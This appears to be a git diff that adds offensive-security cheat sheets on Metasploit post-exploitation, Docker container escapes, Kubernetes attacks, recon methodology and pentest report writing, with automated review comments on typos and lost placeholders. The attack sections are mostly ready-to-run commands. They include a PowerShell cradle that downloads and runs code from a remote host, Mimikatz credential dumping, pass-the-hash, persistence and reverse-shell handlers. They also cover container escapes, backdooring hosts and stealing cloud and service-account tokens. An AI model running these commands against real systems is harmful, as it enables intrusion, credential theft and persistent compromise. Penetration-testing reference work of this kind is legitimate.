net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB'); +``` + + +### Get System + +```powershell +meterpreter > getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
+ +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` + +### Persistence Startup + +```powershell +OPTIONS: + +-A Automatically start a matching exploit/multi/handler to connect to the agent +-L Location in target host to write payload to, if none %TEMP% will be used. +-P Payload to use, default is windows/meterpreter/reverse_tcp. +-S Automatically start the agent on boot as a service (with SYSTEM privileges) +-T Alternate executable template to use +-U Automatically start the agent when the User logs on +-X Automatically start the agent when the system boots +-h This help menu +-i The interval in seconds between each connection attempt +-p The port on which the system running Metasploit is listening +-r The IP of the system running Metasploit listening for the connect back + +meterpreter > run persistence -U -p 4242 +``` + +### Network Monitoring + +```powershell +# list interfaces +run packetrecorder -li + +# record interface n°1 +run packetrecorder -i 1 +``` + +### Portforward + +```powershell +portfwd add -l 7777 -r 172.17.0.2 -p 3006 +``` + +### Upload / Download + +```powershell +upload /path/in/hdd/payload.exe exploit.exe +download /path/in/victim +``` + +### Execute from Memory + +```powershell +execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w +``` + +### Mimikatz + +```powershell +load mimikatz +mimikatz_command -f version +mimikatz_command -f samdump::hashes +mimikatz_command -f sekurlsa::wdigest +mimikatz_command -f sekurlsa::searchPasswords +mimikatz_command -f sekurlsa::logonPasswords full +``` + +```powershell +load kiwi +creds_all +golden_ticket_create -d -k -s -u -t +``` + +### Pass the Hash - PSExec + +```powershell +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp +msf exploit(psexec) > exploit +SMBDomain WORKGROUP no The Windows domain to use for authentication +SMBPass 598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf no The password for the specified 
username +SMBUser Lambda no The username to authenticate as +``` + +### Use SOCKS Proxy + +```powershell +setg Proxies socks4:127.0.0.1:1080 +``` + +## Scripting Metasploit + +Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`. +Here is a simple example to script the deployment of a handler an create an Office doc with macro. + +```powershell +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 0.0.0.0 +set LPORT 4646 +set ExitOnSession false +exploit -j -z + + +use exploit/multi/fileformat/office_word_macro +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 10.10.14.22 +set LPORT 4646 +exploit +``` + +## Multiple transports + +```powershell +msfvenom -p windows/meterpreter_reverse_tcp lhost= lport= sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe +``` + +Then, in AddTransports.ps1 + +```powershell +Add-TcpTransport -lhost -lport -RetryWait 10 -RetryTotal 30 +Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 30 +``` + +## Best of - Exploits + +* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue` +* MS08_67 - `exploit/windows/smb/ms08_067_netapi` + +## References + +* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) +* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331) \ No newline at end of file diff --git a/docs/containers/Container - Docker Pentest.md b/docs/containers/Container - Docker Pentest.md new file mode 100644 index 0000000..eff3dc6 --- /dev/null +++ b/docs/containers/Container - Docker Pentest.md 
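Review bot: several command lines in this hunk have lost their placeholder values, most likely angle-bracket tokens stripped during the migration: `msfvenom -p windows/meterpreter_reverse_tcp lhost= lport= ...` in Multiple transports, `Add-TcpTransport -lhost -lport ...` and `Add-WebTransport -Url http(s)://:/ ...` in the AddTransports.ps1 block, and `golden_ticket_create -d -k -s -u -t` under Mimikatz; restore them as visible placeholders (for example `lhost=<IP> lport=<PORT>`) or the lines cannot be copied and used. The PHP line in "Generate a meterpreter", `cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php`, has an unbalanced single quote and no redirect target, so it does not run as written; the opening `<?php` tag and the `>` redirect appear to have been dropped by the same stripping. Also: the Background handler intro `ExitOnSession : the handler will not exit if the meterpreter dies` should say that it is `set ExitOnSession false` which keeps the handler listening after a session dies; `MS17-10 Eternal Blue` should be `MS17-010`; `deployment of a handler an create` -> `and create`; and `HANDLER=false-> Upgrade` is missing the space before the arrow.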
@@ -0,0 +1,250 @@ +# Container - Docker + +> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. + +## Summary + +- [Tools](#tools) +- [Mounted Docker Socket](#mounted-docker-socket) +- [Open Docker API Port](#open-docker-api-port) +- [Insecure Docker Registry](#insecure-docker-registry) +- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) + - [Abusing CAP_SYS_ADMIN capability](#abusing-capsysadmin-capability) + - [Abusing coredumps and core_pattern](#abusing-coredumps-and-corepattern) +- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) +- [References](#references) + +## Tools + +* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations + ```powershell + dockscan unix:///var/run/docker.sock + dockscan -r html -o myreport -v tcp://example.com:5422 + ``` +* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) + ```powershell + ./deepce.sh + ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce + ./deepce.sh --no-enumeration --exploit SOCK --shadow + ./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked" + ``` + +## Mounted Docker Socket + +Prerequisite: +* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` + +Usually found in `/var/run/docker.sock`, for example for Portainer. 
+ +```powershell +curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json +curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create +curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start +``` + +Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) + +```powershell +root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true +[+] Hunt dem Socks +[+] Hunting Down UNIX Domain Sockets from: /var/run/ +[*] Valid Socket: /var/run/docker.sock +[+] Attempting to autopwn +[+] Hunting Docker Socks +[+] Attempting to Autopwn: /var/run/docker.sock +[*] Getting Docker client... +[*] Successfully got Docker client... +[+] Attempting to escape to host... +[+] Attempting in TTY Mode +chroot /host && clear +echo 'You are now on the underlying host' +chroot /host && clear +echo 'You are now on the underlying host' +/ # chroot /host && clear +/ # echo 'You are now on the underlying host' +You are now on the underlying host +/ # id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) +``` + + +## Open Docker API Port + +Prerequisite: +* Docker runned with `-H tcp://0.0.0.0:XXXX` + +```powershell +$ nmap -sCV 10.10.10.10 -p 2376 +2376/tcp open docker Docker 19.03.5 +| docker-version: +| Version: 19.03.5 +| MinAPIVersion: 1.12 +``` + +Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. 
+ +```powershell +$ export DOCKER_HOST=tcp://10.10.10.10:2376 +$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash +or +$ docker -H open.docker.socket:2375 ps +$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash +or +$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq +$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +``` + +From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. + + +## Insecure Docker Registry + +Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. + +```powershell +curl https://registry.example.com/v2//tags/list +docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash +``` + +Access a private registry using OAuth Token from Google + +```powershell +curl 
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email +curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token +docker login -e -u oauth2accesstoken -p "" https://gcr.io +``` + +## Exploit privileged container abusing the Linux cgroup v1 + +Prerequisite (at least one): + * `--privileged` + * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. + + +### Abusing CAP_SYS_ADMIN capability + +```powershell +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "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" | base64 -d | bash -' +``` + +Exploit breakdown : + +```powershell +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` + +### Abusing coredumps and core_pattern + +1. Find the mounting point using `mount` + ```ps1 + $ mount | head -n 1 + overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/YLH6C6EQMMG7DA2AL5DUANDHYJ:/var/lib/docker/overlay2/l/HP7XLDFT4ERSCYVHJ2WMZBG2YT,upperdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff,workdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/work) + ``` +2. Create an evil binary at the root of the filesystem: `cp /tmp/poc /poc` +3. 
Set the program to be executed on the coredumps + ```ps1 + echo "|/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff/poc" > /proc/sys/kernel/core_pattern + ``` +4. Generate a coredump with a faulty program: `gcc -o crash crash.c && ./crash` + ```cpp + int main(void) { + char buf[1]; + for (int i = 0; i < 100; i++) { + buf[i] = 1; + } + return 0; + } + ``` +5. Your payload should have been executed on the host + + +## Breaking out of Docker via runC + +> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team + +Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 + +```powershell +$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC +$ docker run --rm cve-2019-5736:malicious_image_POC +``` + +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + + +## Breaking out of Docker via kernel modules loading + +> When privileged Linux containers attempt to load kernel modules, the modules are loaded into the host's kernel (because there is only *one* kernel, unlike VMs). This provides a route to an easy container escape. 
+ +Exploitation: +* Clone the repository : `git clone https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping` +* Build with `make` +* Start a privileged docker container with `docker run -it --privileged --hostname docker --mount "type=bind,src=$PWD,dst=/root" ubuntu` +* `cd /root` in the new container +* Insert the kernel module with `./escape` +* Run `./execute`! + +Unlike other techniques, this module doesn't contain any syscalls hooks, but merely creates two new proc files; `/proc/escape` and `/proc/output`. + +* `/proc/escape` only answers to write requests and simply executes anything that's passed to it via [`call_usermodehelper()`](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper.html). +* `/proc/output` just takes input and stores it in a buffer when written to, then returns that buffer when it's read from - essentially acting a like a file that both the container and the host can read/write to. + +The clever part is that anything we write to `/proc/escape` gets sandwiched into `/bin/sh -c > /proc/output`. This means that the command is run under `/bin/sh` and the output is redirected to `/proc/output`, which we can then read from within the container. + +Once the module is loaded, you can simply `echo "cat /etc/passwd" > /proc/escape` and then get the result via `cat /proc/output`. Alternatively, you can use the `execute` program to give yourself a makeshift shell (albeit an extraordinarily basic one). + +The only caveat is that we cannot be sure that the container has `kmod` installed (which provides `insmod` and `rmmod`). To overcome this, after building the kernel module, we load it's byte array into a C program, which then uses the `init_module()` syscall to load the module into the kernel without needing `insmod`. If you're interested, take a look at the Makefile. 
+ + +## References + +- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) +- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) +- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) +- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) +- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) +- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping) +* [Escaping privileged containers for fun - 2022-03-06 :: Jordy Zomer](https://pwning.systems/posts/escaping-containers-for-fun/) \ No newline at end of file diff --git a/docs/containers/Container - Kubernetes Pentest.md b/docs/containers/Container - Kubernetes Pentest.md new file mode 100644 index 0000000..5d39b0f --- /dev/null +++ b/docs/containers/Container - Kubernetes Pentest.md 
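Review bot: several curl lines in `Mounted Docker Socket` and `Open Docker API Port` use a typographic en dash in place of two hyphens (`curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' ...`, `curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq`), so curl rejects the option as soon as the line is pasted; replace every `–` with `--`. The next line, `https://tls-opendocker.socket2376/containers/create?name=test`, has lost the `:` before the port. The `Summary` at the top omits the `Breaking out of Docker via kernel modules loading` section that closes the file, so it needs a matching `- [Breaking out of Docker via kernel modules loading](#breaking-out-of-docker-via-kernel-modules-loading)` entry. In `Insecure Docker Registry`, `curl https://registry.example.com/v2//tags/list` and `docker pull https://registry.example.com:443/:` have lost their image and tag placeholders (most likely `<image>`/`<tag>` swallowed as HTML), and `docker login -e -u oauth2accesstoken -p "" https://gcr.io` has an empty password and a bare `-e` with no value, so the token placeholder should be restored there too. Style: the fdpasser block puts a URL and prose lines ("In container, as root:") inside a `powershell` fence, and the crash program under `Abusing coredumps and core_pattern` is C but fenced as `cpp`. Typos: "Socker mounted as volume", "Docker runned with".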
@@ -0,0 +1,67 @@ +# Container - Kubernetes + +> Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications + +## Summary + +- [Tools](#tools) +- [Exploits](#exploits) + - [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) + - [Obtaining Service Account Token](#obtaining-service-account-token) +- [References](#references) + +## Tools + +* [BishopFox/badpods](https://github.com/BishopFox/badpods) - A collection of manifests that will create pods with elevated privileges. + ```ps1 + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml + ``` +* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - Executes commands in a container on a kubelet endpoint that allows anonymous authentication +* [DataDog/KubeHound](https://github.com/DataDog/KubeHound) - Kubernetes Attack Graph + ```ps1 + # Critical paths enumeration + kh.containers().criticalPaths().count() + 
kh.containers().dedup().by("name").criticalPaths().count() + kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count() + kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count() + kh.endpoints(EndpointExposure.External).criticalPaths().count() + kh.services().criticalPaths().count() + + # DNS services and port + kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1) + .dedup().valueMap("serviceDns","port") + .group().by("serviceDns").by("port") + ``` + +## Exploits + +### Accessible kubelet on 10250/TCP + +Requirements: +* `--anonymous-auth`: Enables anonymous requests to the Kubelet server + +* Getting pods: `curl -ks https://worker:10250/pods` +* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` + + +### Obtaining Service Account Token + +Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` + +Use the service account token: +* on `kube-apiserver` API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` +* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` + + +## References + +* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) +* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/) +* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/) \ No newline at end of file diff --git a/docs/methodology/Methodology and enumeration.md b/docs/methodology/Methodology and enumeration.md new file mode 100644 index 0000000..e6d2081 --- /dev/null +++ b/docs/methodology/Methodology and enumeration.md 
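Review bot: in `Obtaining Service Account Token` the bearer token placeholder has been lost: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` sends an empty Authorization header and the kubectl line has `--token=""`; restore a visible placeholder (the `{namespace}`/`{pod}` brace style already used in the kubelet section would keep the file consistent). The `Accessible kubelet on 10250/TCP` requirement should name the value that matters, `--anonymous-auth=true`, and a one-line mitigation, setting `--anonymous-auth=false` on the kubelet, would make the section useful to readers on the defending side. Also the KubeHound queries are Gremlin rather than PowerShell, so the `ps1` fence tag is misleading, and the kubectl example has a stray leading space inside its backticks.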
@@ -0,0 +1,149 @@ +# Bug Hunting Methodology and Enumeration + +## Summary + +* [Passive Recon](#passive-recon) + * Shodan + * Wayback Machine + * The Harvester + * Github OSINT + +* [Active Recon](#active-recon) + * [Network discovery](#network-discovery) + * [Web discovery](#web-discovery) + +* [Web Vulnerabilities](#looking-for-web-vulnerabilities) + +## Passive recon + +* Using [Shodan](https://www.shodan.io/) to detect similar app + + ```bash + can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse) + nmap --script shodan-hq.nse --script-args 'apikey=,target=' + ``` + +* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints + + ```bash + look for JS files, old links + curl -sX GET "http://web.archive.org/cdx/search/cdx?url=&output=text&fl=original&collapse=urlkey&matchType=prefix" + ``` + +* Using [The Harvester](https://github.com/laramies/theHarvester) + + ```python + python theHarvester.py -b all -d domain.com + ``` + +* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git) + ```bash + gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 + ``` + +* Perform Google Dorks search + + +## Active recon + +### Network discovery + +* Subdomains enumeration + * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) + * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) + * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) + +* Network discovery + * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) + * Discover services, version 
and banners + +* Review latest acquisitions + +* ASN enumeration + * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` + +* DNS Zone Transfer + ```ps1 + host -t ns domain.local + domain.local name server master.domain.local. + + host master.domain.local + master.domain.local has address 192.168.1.1 + + dig axfr domain.local @192.168.1.1 + ``` + +### Web discovery + +* Locate `robots.txt`, `security.txt`, `sitemap.xml` files +* Retrieve comments in source code +* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls) +* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) + +* List all the subdirectories and files with `gobuster` or `ffuf` + ```ps1 + # gobuster -w wordlist -u URL -t threads + ./gobuster -u http://example.com/ -w words.txt -t 10 + ``` + +* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac) + ```bash + bfac --url http://example.com/test.php --level 4 + bfac --list testing_list.txt + ``` + +* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer + * Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...) 
+ +* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness) + +* Automated vulnerability scanners + * [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com` + * [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner) + * [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com` + +* Manual Testing: Explore the website with a proxy: + * [Caido - A lightweight web security auditing toolkit](https://caido.io/) + * [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/) + * [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload) + + +## Looking for Web vulnerabilities + +* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, .... +* Test for Business Logic weaknesses + * High or negative numerical values + * Try all the features and click all the buttons +* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html + +* Subscribe to the site and pay for the additional functionality to test + +* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392) + > if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free + + From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. 
" + e.g : + + Test card numbers and tokens + + | NUMBER | BRAND | TOKEN | + | :------------- | :------------- | :------------- | + | 4242424242424242 | Visa | tok_visa | + | 4000056655665556 | Visa (debit) | tok_visa_debit | + | 5555555555554444 | Mastercard | tok_mastercard | + + International test card numbers and tokens + + | NUMBER | TOKEN | COUNTRY | BRAND | + | :------------- | :------------- | :------------- | :------------- | + | 4000000400000008 | tok_at | Austria (AT) | Visa | + | 4000000560000004 | tok_be | Belgium (BE) | Visa | + | 4000002080000001 | tok_dk | Denmark (DK) | Visa | + | 4000002460000001 | tok_fi | Finland (FI) | Visa | + | 4000002500000003 | tok_fr | France (FR) | Visa | + +## References + +* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) +* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) diff --git a/docs/methodology/Vulnerability Reports.md b/docs/methodology/Vulnerability Reports.md new file mode 100644 index 0000000..73c1f3b --- /dev/null +++ b/docs/methodology/Vulnerability Reports.md 
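Review bot: the `bash` fences under `Passive recon` mix prose with commands: `can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)` and `look for JS files, old links` are not prefixed with `#`, so pasting either block into a shell fails on the first line; prefix them with `#` or move them into the bullet text. The same blocks have stripped placeholders (`--script-args 'apikey=,target='`, `cdx?url=&output=text`), which should be restored as `<apikey>`, `<target>` and `<domain>`. Broken links: `[GitHub]()` has an empty URL, and `[tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)` lacks the `https://` scheme so it renders as a relative link. Minor: "Take screenshots for every websites" should be "every website", and the `Summary` lists Shodan, Wayback Machine, The Harvester and Github OSINT without anchors while every other entry has one.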
@@ -0,0 +1,52 @@ +# Vulnerability Reports + +## Summary + +* [Tools](#tools) +* [Vulnerability Report Structure](#vulnerability-report-structure) +* [Vulnerability Details Structure](#vulnerability-details-structure) +* [General Guidelines](#general-guidelines) +* [References](#references) + + +## Tools + +Tools to help you collaborate and generate your reports. + +* [GhostManager/Ghostwriter](https://github.com/GhostManager/Ghostwriter) - The SpecterOps project management and reporting engine +* [pwndoc/pwndoc](https://github.com/pwndoc/pwndoc) - Pentest Report Generator + +List of penetration test reports and templates. + +* [reconmap/pentest-reports](https://github.com/reconmap/pentest-reports) - Collection of penetration test reports and pentest report templates +* [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) - A list of public penetration test reports published by several consulting firms and academic security groups. + + +## Vulnerability Report Structure + +* Executive Summary +* Security Findings and Recommendations +* Vulnerabilities (sorted by severity) +* Appendix (optional) + + +## Vulnerability Details Structure + +* **Summary**: a concise introduction to the vulnerability, providing a snapshot of the issue and its potential reach.. +* **Impact**: detailed insights into the potential business ramifications that could arise from exploiting this vulnerability. +* **Reproductions Steps**: a comprehensive, step-by-step walkthrough on how to replicate the issue,, complete with screenshots, HTTP requests or Proof of Concept code snippets. +* **Recommendations**: suggestions and best practices for addressing and resolving the highlighted issue. +* **References**: links to external content, documentation, and security guidelines, including resources like OWASP. +* **Severity**: Include a severity score like CVSS. + + +## General Guidelines + +* Use a **Passive Voice Form**. 
+* **Obfuscate** the secrets: passwords, token, ... +* Add **caption** to all figures and pictures. + +## References + +* [Best Practices for Writing Quality Vulnerability Reports - Krzysztof Pranczk](https://itnext.io/best-practices-for-writing-quality-vulnerability-reports-119882422a27) +* [Overview of technical writing courses - Google Technical Writing](https://developers.google.com/tech-writing/overview) \ No newline at end of file diff --git a/docs/pentest/Bind Shell Cheatsheet.md b/docs/pentest/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..c51bb7e --- /dev/null +++ b/docs/pentest/Bind Shell Cheatsheet.md 
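Review bot: typos in `Vulnerability Details Structure`: "Reproductions Steps" should be "Reproduction Steps", and two items end in doubled punctuation ("its potential reach..", "replicate the issue,, complete with"). In `General Guidelines`, "passwords, token, ..." should be "tokens", and the obfuscation item would be more actionable if it pointed back to the screenshots and HTTP requests called for under Reproduction Steps, since those are where credentials and session tokens usually end up in a report.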
